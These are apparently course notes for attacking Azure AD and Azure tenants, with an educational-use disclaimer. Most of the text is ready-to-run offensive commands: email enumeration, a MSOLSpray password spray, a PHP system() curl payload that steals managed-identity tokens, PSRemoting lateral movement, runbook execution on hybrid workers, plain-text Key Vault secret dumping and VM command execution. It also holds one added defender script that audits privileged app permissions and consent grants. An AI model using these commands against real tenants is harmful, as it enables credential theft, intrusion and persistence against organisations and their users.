“All knowledge in this article is for educational and information security purposes only.
It must not be used to attack systems that you do not own or are not permitted to test.”
I. Reconnaissance (external)
Additional useful tool: https://github.com/nyxgeek/o365recon
Find the target's subdomains
Using MicroBurst
. .\Invoke-EnumerateAzureSubDomains.ps1
Invoke-EnumerateAzureSubDomains -Base <target> -Verbose
Enumerate valid emails:
o365creeper.py -f emails.txt -o validemails.txt
II. Reconnaissance (internal)
Using ROADtools
roadrecon auth -u <Email> -p <Password>
roadrecon gather
roadrecon gui
Using StormSpotter
python ssbackend.pyz
quasar.cmd serve -p 9091 --history
Using BloodHound / AzureHound
. C:\AzAD\Tools\AzureHound\AzureHound.ps1
Invoke-AzureHound -Verbose
III. Initial attack
Brute force (password spray)
MSOLSpray.ps1
Invoke-MSOLSpray -UserList validemails.txt -Password test -Verbose
Illicit Consent Grant attack.
Using
IV. Lateral movement
Run the env command and look for IDENTITY_HEADER and IDENTITY_ENDPOINT; dump a managed identity token with this code:
<?php
// PHP single quotes keep $IDENTITY_ENDPOINT and $IDENTITY_HEADER literal; the shell started by system() expands them
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H "secret:$IDENTITY_HEADER"');
?>
Check Deployments
Get-AzResourceGroupDeployment -ResourceGroupName <Resource_group_name>
Save deployment template
Save-AzResourceGroupDeploymentTemplate -ResourceGroupName <Resource_group_name> -DeploymentName <Deployment_Name>
VM interaction:
Access the VM using PSRemoting
$password = ConvertTo-SecureString 'testpassword' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('testuser', $password)
$sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession -Session $sess
Transfer file:
Copy-Item -ToSession $sess -Path tests.exe -Destination C:\Users\ -Verbose
Execute a command:
Invoke-Command -Session $sess -ScriptBlock{ls C:\Users\}
Using Hybrid Runbook Worker
List Automation Hybrid Worker Groups
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <Automation_account_name> -ResourceGroupName <Resource_group_name>
Import-AzAutomationRunbook -Name studentx -Path C:\AzAD\Tools\studentx.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Type PowerShell -Force -Verbose
Publish-AzAutomationRunbook -RunbookName studentx -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
Start-AzAutomationRunbook -RunbookName studentx -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose
Dump PRT
Use the PRT in Chrome
Abuse dynamic groups
Abuse Application Proxy
Check Azure AD Connect and its authentication type
Get-ADSyncConnector
Cloud to On-prem:
abuse PTA,
obtain PRT cookie
Read more: https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/
The Global Administrator or Intune Administrator role can execute PowerShell scripts on an enrolled Windows device
On-prem to Cloud:
abuse PHS
V. Persistence
Add a new application that has high permissions and then use that for persistence
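Defender-side counterpart to this persistence item and to the Illicit Consent Grant item in section III, added here as an example (PowerShell with the AzureAD module the notes already use; not part of the original notes): it lists the Microsoft Graph application permissions held by each service principal together with the date of its newest credential, then the delegated grants consented by individual users. It assumes an existing Connect-AzureAD session with directory read rights; the $highPriv list is an assumption to tune per tenant.

```powershell
# Added audit example (not part of the original notes). Assumes an existing
# Connect-AzureAD session with directory read rights.

$allSps = Get-AzureADServicePrincipal -All $true
$spByObjectId = @{}
foreach ($sp in $allSps) { $spByObjectId[$sp.ObjectId] = $sp }

# Microsoft Graph's well-known AppId; its AppRoles map app role GUIDs to permission names.
$graphSp = $allSps | Where-Object { $_.AppId -eq '00000003-0000-0000-c000-000000000000' }

# Permissions treated as high privilege for this audit (assumption: tune for your tenant).
$highPriv = @('RoleManagement.ReadWrite.Directory', 'Directory.ReadWrite.All',
              'AppRoleAssignment.ReadWrite.All', 'Application.ReadWrite.All')

# (1) Application permissions: every app role assignment where Graph is the resource,
#     i.e. which service principal holds which Graph permission. A fresh secret or
#     certificate on a privileged service principal is a common persistence indicator.
$graphGrants = Get-AzureADServiceAppRoleAssignment -ObjectId $graphSp.ObjectId -All $true
$appRoleFindings = foreach ($g in $graphGrants) {
    $role  = $graphSp.AppRoles | Where-Object { $_.Id -eq $g.Id }
    $creds = @(Get-AzureADServicePrincipalPasswordCredential -ObjectId $g.PrincipalId) +
             @(Get-AzureADServicePrincipalKeyCredential -ObjectId $g.PrincipalId)
    $newest = $creds | Sort-Object StartDate -Descending | Select-Object -First 1
    [pscustomobject]@{
        ServicePrincipal = $g.PrincipalDisplayName
        AppId            = $spByObjectId[$g.PrincipalId].AppId
        Permission       = $role.Value
        HighPrivilege    = $highPriv -contains $role.Value
        NewestCredential = $newest.StartDate
    }
}
$appRoleFindings | Where-Object HighPrivilege |
    Sort-Object NewestCredential -Descending | Format-Table -AutoSize

# (2) Delegated grants: ConsentType 'Principal' means a single user consented on their own
#     (the illicit consent grant pattern); 'AllPrincipals' means tenant-wide admin consent.
Get-AzureADOAuth2PermissionGrant -All $true |
    Where-Object { $_.ConsentType -eq 'Principal' } |
    ForEach-Object {
        [pscustomobject]@{
            ClientApp   = $spByObjectId[$_.ClientId].DisplayName
            Publisher   = $spByObjectId[$_.ClientId].PublisherName
            ConsentedBy = (Get-AzureADUser -ObjectId $_.PrincipalId).UserPrincipalName
            Scope       = $_.Scope
        }
    } | Format-Table -AutoSize
```

Review any high-privilege row whose credential date you cannot tie to a change record, and any user-consented client whose Publisher is empty or unknown.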
Useful commands:
Login:
az login -u test@test.onmicrosoft.com -p testpassword
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds
AzureHound
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds
Connect-AzureAD -Credential $creds
.\AzureHound.ps1
Invoke-AzureHound -Verbose
Get all users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName (only UPNs)
Show Global Administrators
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
List all custom directory roles:
Import-Module AzureADPreview\AzureADPreview.psd1
$passwd = ConvertTo-SecureString "testpassword" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@test.com",$passwd)
Connect-AzureAD -Credential $creds
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} |select DisplayName
List resources (Az module)
Get-AzResource
Get all the role assignments for the test user
Get-AzRoleAssignment -SignInName test@test.onmicrosoft.com
Get-AzRoleAssignment -Scope <Scope>
Check the definition of this role
Get-AzRoleDefinition -Name <Role_name>
List all the VMs where the current user has at least the Reader role
Get-AzVM | fl
or
az vm list
List all App Services. Filter on the 'Kind' property, otherwise both App Services and Function Apps are listed
Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
az webapp list (list App Services)
az webapp list --query "[].[name]" -o table (list only the names of App Services)
To list Function Apps
Get-AzFunctionApp
List storage accounts
Get-AzStorageAccount | fl
az storage account list
List the key vaults readable by the current user
Get-AzKeyVault
az keyvault list
Get-AzKeyVaultSecret -VaultName <VaultName>
Get-AzKeyVaultSecret -VaultName <VaultName> -Name <Secret_name> -AsPlainText
Check if there is a user logged-in to az cli on that machine
az ad signed-in-user show
Check if there is a public IP address attached to the VM
Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_name> | select -ExpandProperty NetworkProfile
Get more details about the network interface attached to the VM using the below command
Get-AzNetworkInterface -Name <VM_interface>
Get the public IP address attached to the VM
Get-AzPublicIpAddress -Name <IP_name>
Get VM details
Get-AzVM -Name <VM_name> -ResourceGroupName <Resource_group_name> | fl *
Get group information and list its principals
Get-AzADGroup -DisplayName <Group_name>
Enumerate the service principals in Azure AD and check which service principal the AppID xx belongs to
Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<App_id>"} | fl
Disconnect
Disconnect-AzAccount
Check whether any extensions are already installed
Get-AzVMExtension -ResourceGroupName "Research" -VMName <VMName>
Run a PowerShell script file on the VM
Invoke-AzVMRunCommand -VMName <VMName> -ResourceGroupName <ResourceGroupName> -CommandId 'RunPowerShellScript' -ScriptPath 'test.ps1' -Verbose